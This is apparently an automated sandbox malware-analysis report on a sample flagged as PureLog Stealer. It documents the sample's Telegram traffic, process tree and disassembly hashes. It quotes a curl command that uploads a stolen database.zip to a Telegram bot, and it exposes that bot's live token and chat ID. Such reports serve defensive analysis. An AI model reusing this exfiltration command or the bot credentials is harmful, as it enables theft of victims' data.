                              Sep 1, 2024 01:08:59.096323013 CEST44349730149.154.167.220192.168.2.4
                              Sep 1, 2024 01:08:59.738909960 CEST44349730149.154.167.220192.168.2.4
                              Sep 1, 2024 01:08:59.739036083 CEST49730443192.168.2.4149.154.167.220
                              Sep 1, 2024 01:08:59.741645098 CEST49730443192.168.2.4149.154.167.220
                              Sep 1, 2024 01:08:59.741652012 CEST44349730149.154.167.220192.168.2.4
                              Sep 1, 2024 01:08:59.741863012 CEST44349730149.154.167.220192.168.2.4
                              Sep 1, 2024 01:08:59.757572889 CEST49730443192.168.2.4149.154.167.220
                              Sep 1, 2024 01:08:59.804505110 CEST44349730149.154.167.220192.168.2.4
                              Sep 1, 2024 01:09:00.043582916 CEST44349730149.154.167.220192.168.2.4
                              Sep 1, 2024 01:09:00.048475027 CEST49730443192.168.2.4149.154.167.220
                              Sep 1, 2024 01:09:00.048502922 CEST44349730149.154.167.220192.168.2.4
                              Sep 1, 2024 01:09:00.363153934 CEST44349730149.154.167.220192.168.2.4
                              Sep 1, 2024 01:09:00.363305092 CEST44349730149.154.167.220192.168.2.4
                              Sep 1, 2024 01:09:00.365330935 CEST49730443192.168.2.4149.154.167.220
                              Sep 1, 2024 01:09:00.368611097 CEST49730443192.168.2.4149.154.167.220
                              Sep 1, 2024 01:09:06.961524010 CEST49733443192.168.2.4149.154.167.220
                              Sep 1, 2024 01:09:06.961560965 CEST44349733149.154.167.220192.168.2.4
                              Sep 1, 2024 01:09:06.961833000 CEST49733443192.168.2.4149.154.167.220
                              Sep 1, 2024 01:09:06.973418951 CEST49733443192.168.2.4149.154.167.220
                              Sep 1, 2024 01:09:06.973432064 CEST44349733149.154.167.220192.168.2.4
                              Sep 1, 2024 01:09:07.578028917 CEST44349733149.154.167.220192.168.2.4
                              Sep 1, 2024 01:09:07.578105927 CEST49733443192.168.2.4149.154.167.220
                              Sep 1, 2024 01:09:07.579659939 CEST49733443192.168.2.4149.154.167.220
                              Sep 1, 2024 01:09:07.579667091 CEST44349733149.154.167.220192.168.2.4
                              Sep 1, 2024 01:09:07.579868078 CEST44349733149.154.167.220192.168.2.4
                              Sep 1, 2024 01:09:07.582612991 CEST49733443192.168.2.4149.154.167.220
                              Sep 1, 2024 01:09:07.582943916 CEST49733443192.168.2.4149.154.167.220
                              Sep 1, 2024 01:09:07.582967997 CEST44349733149.154.167.220192.168.2.4
                              Sep 1, 2024 01:09:08.269546986 CEST44349733149.154.167.220192.168.2.4
                              Sep 1, 2024 01:09:08.269625902 CEST44349733149.154.167.220192.168.2.4
                              Sep 1, 2024 01:09:08.269942045 CEST49733443192.168.2.4149.154.167.220
                              Sep 1, 2024 01:09:08.277296066 CEST49733443192.168.2.4149.154.167.220
                              Sep 1, 2024 01:09:08.277308941 CEST44349733149.154.167.220192.168.2.4

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Sep 1, 2024 01:08:59.077136993 CEST6049553192.168.2.41.1.1.1
                              Sep 1, 2024 01:08:59.083726883 CEST53604951.1.1.1192.168.2.4
                              Sep 1, 2024 01:09:26.259202957 CEST5364305162.159.36.2192.168.2.4
                              Sep 1, 2024 01:09:26.749711990 CEST6357753192.168.2.41.1.1.1
                              Sep 1, 2024 01:09:26.758505106 CEST53635771.1.1.1192.168.2.4

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Sep 1, 2024 01:08:59.077136993 CEST192.168.2.41.1.1.10x8d0dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                              Sep 1, 2024 01:09:26.749711990 CEST192.168.2.41.1.1.10xd522Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Sep 1, 2024 01:08:59.083726883 CEST1.1.1.1192.168.2.40x8d0dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                              Sep 1, 2024 01:09:26.758505106 CEST1.1.1.1192.168.2.40xd522Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • api.telegram.org

                              HTTPS Proxied Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449730149.154.167.2204432588C:\Users\user\Desktop\n0PDCyrFnf.exe
                              TimestampBytes transferredDirectionData
                              2024-08-31 23:08:59 UTC312OUTPOST /bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendMessage HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682
                              Content-Type: application/json; charset=utf-8
                              Host: api.telegram.org
                              Content-Length: 438
                              Expect: 100-continue
                              Connection: Keep-Alive
                              2024-08-31 23:09:00 UTC25INHTTP/1.1 100 Continue
                              2024-08-31 23:09:00 UTC438OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 68 61 74 5f 69 64 22 3a 20 20 22 2d 31 30 30 32 31 36 35 34 38 30 38 35 30 22 2c 0d 0a 20 20 20 20 22 74 65 78 74 22 3a 20 20 22 53 59 53 54 45 4d 20 44 41 54 41 5c 72 5c 6e 2d 20 41 6e 74 69 76 69 72 75 73 20 3a 20 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 5c 72 5c 6e 5c 72 5c 6e 48 61 72 64 77 61 72 65 3a 5c 72 5c 6e 2d 20 55 70 74 69 6d 65 3a 20 33 34 32 20 64 61 79 73 20 31 31 20 68 6f 75 72 73 20 31 30 20 6d 69 6e 75 74 65 73 20 33 35 20 73 65 63 6f 6e 64 73 5c 72 5c 6e 2d 20 4f 53 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 72 5c 6e 2d 20 53 63 72 65 65 6e 20 53 69 7a 65 3a 20 31 32 38 30 20 78 20 31 30 32 34 5c 72 5c 6e 2d 20 43 50 55 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65
                              Data Ascii: { "chat_id": "-1002165480850", "text": "SYSTEM DATA\r\n- Antivirus : Windows Defender\r\n\r\nHardware:\r\n- Uptime: 342 days 11 hours 10 minutes 35 seconds\r\n- OS: Microsoft Windows 10 Pro\r\n- Screen Size: 1280 x 1024\r\n- CPU: Intel(R) Core
                              2024-08-31 23:09:00 UTC947INHTTP/1.1 200 OK
                              Server: nginx/1.18.0
                              Date: Sat, 31 Aug 2024 23:09:00 GMT
                              Content-Type: application/json
                              Content-Length: 559
                              Connection: close
                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                              Access-Control-Allow-Origin: *
                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                              {"ok":true,"result":{"message_id":12,"from":{"id":7516945260,"is_bot":true,"first_name":"bypasservm","username":"bypasservmbot"},"chat":{"id":-1002165480850,"title":"UNSTOPPABLE","type":"supergroup"},"date":1725145740,"text":"SYSTEM DATA\n- Antivirus : Windows Defender\n\nHardware:\n- Uptime: 342 days 11 hours 10 minutes 35 seconds\n- OS: Microsoft Windows 10 Pro\n- Screen Size: 1280 x 1024\n- CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n- GPU: K8F5EY\n- RAM: 4.00 GB\n- HWID: 71434D56-1548-ED3D-AEE6-C75AECD93BF0"}}


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.449733149.154.167.2204432080C:\Windows\System32\curl.exe
                              TimestampBytes transferredDirectionData
                              2024-08-31 23:09:07 UTC251OUTPOST /bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument HTTP/1.1
                              Host: api.telegram.org
                              User-Agent: curl/7.83.1
                              Accept: */*
                              Content-Length: 9488
                              Content-Type: multipart/form-data; boundary=------------------------42278cd3296aea35
                              2024-08-31 23:09:07 UTC9488OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 32 32 37 38 63 64 33 32 39 36 61 65 61 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 64 61 74 61 62 61 73 65 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 08 00 21 99 1f 59 e1 c0 35 24 14 08 00 00 9d 21 00 00 1b 00 00 00 64 61 74 61 62 61 73 65 5c 44 4c 4c 73 5f 69 6e 5f 6d 65 6d 6f 72 79 2e 74 78 74 c5 59 dd 72 da 4a 12 be df aa 7d 87 54 f9 66 f7 62 55 33 a3 d1 fc 9c 3b 02 f8 84 13 63 93 08 db f1 29 55 51 a3 51
                              Data Ascii: --------------------------42278cd3296aea35Content-Disposition: form-data; name="document"; filename="database.zip"Content-Type: application/octet-streamPK!Y5$!database\DLLs_in_memory.txtYrJ}TfbU3;c)UQQ
                              2024-08-31 23:09:08 UTC388INHTTP/1.1 200 OK
                              Server: nginx/1.18.0
                              Date: Sat, 31 Aug 2024 23:09:08 GMT
                              Content-Type: application/json
                              Content-Length: 432
                              Connection: close
                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                              Access-Control-Allow-Origin: *
                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                              2024-08-31 23:09:08 UTC432INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 31 36 39 34 35 32 36 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 62 79 70 61 73 73 65 72 76 6d 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 79 70 61 73 73 65 72 76 6d 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 31 36 35 34 38 30 38 35 30 2c 22 74 69 74 6c 65 22 3a 22 55 4e 53 54 4f 50 50 41 42 4c 45 22 2c 22 74 79 70 65 22 3a 22 73 75 70 65 72 67 72 6f 75 70 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 35 31 34 35 37 34 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 64 61 74 61 62 61 73 65 2e 7a 69 70
                              Data Ascii: {"ok":true,"result":{"message_id":13,"from":{"id":7516945260,"is_bot":true,"first_name":"bypasservm","username":"bypasservmbot"},"chat":{"id":-1002165480850,"title":"UNSTOPPABLE","type":"supergroup"},"date":1725145748,"document":{"file_name":"database.zip


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:19:08:51
                              Start date:31/08/2024
                              Path:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\Desktop\n0PDCyrFnf.exe"
                              Imagebase:0x880000
                              File size:367'616 bytes
                              MD5 hash:88E5D9D97D0E3C83E74926986D6E5EF6
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1638451242.0000000000882000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:1
                              Start time:19:08:57
                              Start date:31/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:2
                              Start time:19:08:57
                              Start date:31/08/2024
                              Path:C:\Windows\System32\wbem\WMIC.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\Wbem\WMIC.exe" path Win32_VideoController get VideoModeDescription /format:csv
                              Imagebase:0x7ff7da0b0000
                              File size:576'000 bytes
                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              General

                              Target ID:3
                              Start time:19:09:05
                              Start date:31/08/2024
                              Path:C:\Windows\System32\curl.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\system32\curl.exe" -X POST -H "content-type: multipart/form-data" -F document=@C:\Users\user\AppData\Local\Temp\database.zip -F chat_id=-1002165480850 https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument
                              Imagebase:0x7ff7a84a0000
                              File size:530'944 bytes
                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              General

                              Target ID:6
                              Start time:19:09:17
                              Start date:31/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Disassembly

                              Reset < >

                                Executed Functions

                                Function 00007FFD9B6B0D48 Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830229431.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b6b0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID: 5[_H
                                • API String ID: 0-3279724263
                                • Opcode ID: f72e421d581370bae4af4e500010984c07e9f8d165a3d4b55954537b3489e621
                                • Instruction ID: abe4184c91790f95421f595b74668b4e9a4f574b3ea38bc7c29b3e1ea6b796fb
                                • Opcode Fuzzy Hash: f72e421d581370bae4af4e500010984c07e9f8d165a3d4b55954537b3489e621
                                • Instruction Fuzzy Hash: 42A11AB2A0DA8D8FD756DB6888657A87FF1FF66310F4000BAD019DB2D6DB7828048740
                                Function 00007FFD9B9DB080 Relevance: 1.9, Strings: 1, Instructions: 667COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID: "_H
                                • API String ID: 0-1437735873
                                • Opcode ID: 7368100d19a3d7dbb965c678ca9ba4efa4f1da386ad103cf60aed413287b6d6e
                                • Instruction ID: a569b0afc95a239210ae107193b95c7eba4c6cce13aa3ebd5cacb1a5d4834049
                                • Opcode Fuzzy Hash: 7368100d19a3d7dbb965c678ca9ba4efa4f1da386ad103cf60aed413287b6d6e
                                • Instruction Fuzzy Hash: 04915B12B2EA8E1FE765D7BD54646743BD1EFC5310B0902FAE44ACB1A7DD18AD428381
                                Function 00007FFD9B9D6D25 Relevance: 1.8, Strings: 1, Instructions: 549COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID: 3*_H
                                • API String ID: 0-3005530972
                                • Opcode ID: 0932643d14e9f5bb3839854c69d15f5ad4c71b7fe764d762fadb4562af8e2774
                                • Instruction ID: 8630eb62eaf8cf5b58df183eda8c76107ef7e0b4f3052c9e96c57cdb024ab2c1
                                • Opcode Fuzzy Hash: 0932643d14e9f5bb3839854c69d15f5ad4c71b7fe764d762fadb4562af8e2774
                                • Instruction Fuzzy Hash: 84020731A19A4D8FDB54DF5CC4A1AA97BE1FFA9310F150269E449D72A6CA34FC42C7C0
                                Function 00007FFD9B9DC259 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID: I
                                • API String ID: 0-3707901625
                                • Opcode ID: 23b2cfad95e94c6d520644333460ff7c499d797759226c0eeeb7c365a81e7273
                                • Instruction ID: 4435f49dee7f8a70c60cc3e85c6e2161107d746ff3a98e8f9654461940582b13
                                • Opcode Fuzzy Hash: 23b2cfad95e94c6d520644333460ff7c499d797759226c0eeeb7c365a81e7273
                                • Instruction Fuzzy Hash: 69E0ED6154E7C44FCB16AA7588699447FA0AE6721178B41EED145CF1B3E6198849C701
                                Function 00007FFD9B9D65F3 Relevance: .6, Instructions: 614COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e7b269738b638efcd2ce57e95cfff90b6dad764eb2d797c118d76686c7efc7a6
                                • Instruction ID: d6a310558917fba845ecdb36b2f47ce99a546295721ae4b91a37a9089a506026
                                • Opcode Fuzzy Hash: e7b269738b638efcd2ce57e95cfff90b6dad764eb2d797c118d76686c7efc7a6
                                • Instruction Fuzzy Hash: D512FA30A1DA4D9FDB94DF5CC465AE97BE1FF99310F1502AAD449C72A6CA34E881C780
                                Function 00007FFD9B9D79AC Relevance: .6, Instructions: 613COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: aed848affe05d4de9daa543ddcd0a4b999b07a1f605d0bf0b8dda84648e96e3c
                                • Instruction ID: c8973066bce1e48e072e14ea5cfe64302028f6e0df559648a4438637dabcba2c
                                • Opcode Fuzzy Hash: aed848affe05d4de9daa543ddcd0a4b999b07a1f605d0bf0b8dda84648e96e3c
                                • Instruction Fuzzy Hash: F012D530A19A4D9FDB98DF5CC495AA9B7E1FFA8310F15026EE449C7296CB34EC41CB81
                                Function 00007FFD9B75A19E Relevance: .6, Instructions: 611COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830778276.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b750000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e2a3a024f31d32de162c607ed61bcfa8b8ec4923e99bcd5b6b9b12299b791705
                                • Instruction ID: 49dbfe5e9ee2a061469785218f7bbb064574091118ea66f64d697487a541ca7c
                                • Opcode Fuzzy Hash: e2a3a024f31d32de162c607ed61bcfa8b8ec4923e99bcd5b6b9b12299b791705
                                • Instruction Fuzzy Hash: 53125672A0EB8D0FE7A5DBA88865A743BE1EF55310B1901FAD048C71F3DE69AC42C341
                                Function 00007FFD9B9D03F0 Relevance: .6, Instructions: 586COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9af70adfedecdc080538a465c87a62fb65879fd45b602c580877bfe278eaf54e
                                • Instruction ID: 19665684105fa0146b2aedaa7ccb1bd52c878061f7662b81971b4b0b2ed2d5b9
                                • Opcode Fuzzy Hash: 9af70adfedecdc080538a465c87a62fb65879fd45b602c580877bfe278eaf54e
                                • Instruction Fuzzy Hash: 78125830A1DA8E5FDB65DFA8C465AA97BE1FF94300F1502BDE04DC71A6DA24A842C7C0
                                Function 00007FFD9B9DA968 Relevance: .5, Instructions: 493COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 594f7f66f3e4b18e7d2fc83479fea2830d88a4af42923c9335655909fe3c7bfe
                                • Instruction ID: 837501dff978faa7f64478f04dc9ddf1cbb8e88d7180b643c5f1890977d7b561
                                • Opcode Fuzzy Hash: 594f7f66f3e4b18e7d2fc83479fea2830d88a4af42923c9335655909fe3c7bfe
                                • Instruction Fuzzy Hash: 47E14721B2EA4E1FE7A8AB79847167977C2EFD8310F4502B9E14EC71E7DD1CA9428341
                                Function 00007FFD9B9D000A Relevance: .4, Instructions: 405COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 17b93d7b5a7cb020e2c5ce31856659e2c5422005d7c89a78599e5104efb84861
                                • Instruction ID: f4aa447976efad86f77d349abe871968612105c4fae7ea4e39dc854ed5feff4d
                                • Opcode Fuzzy Hash: 17b93d7b5a7cb020e2c5ce31856659e2c5422005d7c89a78599e5104efb84861
                                • Instruction Fuzzy Hash: 60E11730A1EA4D5FDBA5DB68C474AA87BB1FFA5300F1542AAE04DC71A2CE34AD45C781
                                Function 00007FFD9B9D9670 Relevance: .4, Instructions: 404COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7a348997d3af10dfa2496e1cc6f996e3a4308bc4e3d29a2fc5aaa8620b09b255
                                • Instruction ID: 3f4482635b15c5a706d4bf91f5d65d2a0e4c0661d1c4fc2a36fdd6f2dde2af5f
                                • Opcode Fuzzy Hash: 7a348997d3af10dfa2496e1cc6f996e3a4308bc4e3d29a2fc5aaa8620b09b255
                                • Instruction Fuzzy Hash: 19D13F30A19A4D8FDF98EF5CC495AADB7E1FFA8300F554269E40DD7295CA34E881CB81
                                Function 00007FFD9B9DA1BC Relevance: .4, Instructions: 364COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c70281cf3c561d95a9f0dac89e5efcf780fd28327baee40ad1b8867e7ceb609e
                                • Instruction ID: d92f69d7cf0c7f0b094100546413c03f18cd48f511b5869f6d966b7171c6f264
                                • Opcode Fuzzy Hash: c70281cf3c561d95a9f0dac89e5efcf780fd28327baee40ad1b8867e7ceb609e
                                • Instruction Fuzzy Hash: 06C1E230619A4D8FDBA4EF29C454A69B7E1FFA8304F41067DE099C72B2DB35E942CB41
                                Function 00007FFD9B75242D Relevance: .4, Instructions: 352COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830778276.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b750000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: df48106af7eddd3f04363b93d420aa1c010054f8f562c5e85d20562d2a5de204
                                • Instruction ID: 2e004f517f87c1d71ad4ba7e7333947f730118bcb8029410e56af1095df5ed53
                                • Opcode Fuzzy Hash: df48106af7eddd3f04363b93d420aa1c010054f8f562c5e85d20562d2a5de204
                                • Instruction Fuzzy Hash: A4B1E762A0FBCD0FEBA5ABE858745A97BA0EF55314F0902FBD44CC70F3D95869068311
                                Function 00007FFD9B75953E Relevance: .3, Instructions: 342COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830778276.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b750000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3a9418d0a1771eb6f8576d3e5f9f6497855b5b44d2753d35655a64c50d2621f3
                                • Instruction ID: 6c0459900a4c91e9bc125d40e52770c8f2db9947133101087399f994a67f757c
                                • Opcode Fuzzy Hash: 3a9418d0a1771eb6f8576d3e5f9f6497855b5b44d2753d35655a64c50d2621f3
                                • Instruction Fuzzy Hash: 54B10722A0FBCD1FE7A59BA848685B97BE1EF55314F0902BBD44DC70F3DA58A909C341
                                Function 00007FFD9B9DABB0 Relevance: .3, Instructions: 305COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9db4119274cb75c9239f71698fce760fec028deb2932406613d02b4d595e2b36
                                • Instruction ID: 9393cbcdf269f28b57b14affdf42abddd67f0f247b66d7ff6b4bc68de4e4692d
                                • Opcode Fuzzy Hash: 9db4119274cb75c9239f71698fce760fec028deb2932406613d02b4d595e2b36
                                • Instruction Fuzzy Hash: D6A11431B2DA1D4FE768EA29C06167A77D1EF98314F01027DE18FC76E6DE28B9018751
                                Function 00007FFD9B9D58A8 Relevance: .3, Instructions: 261COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 94cff0e5c198df7de9b7087ea0274e328bdbd1b60b576d134e3740217ca672d5
                                • Instruction ID: 8a779b869c55afdd151bd599edc4c8fdbf020746088303623c597c210cb29437
                                • Opcode Fuzzy Hash: 94cff0e5c198df7de9b7087ea0274e328bdbd1b60b576d134e3740217ca672d5
                                • Instruction Fuzzy Hash: DC718D3071CD098FDB68EA29D4A4A7573D2EF99314B15416CE09FCB6E6CE28FC429784
                                Function 00007FFD9B9DB88D Relevance: .3, Instructions: 260COMMON
                                Download Yara Rule
                                Memory Dump Source
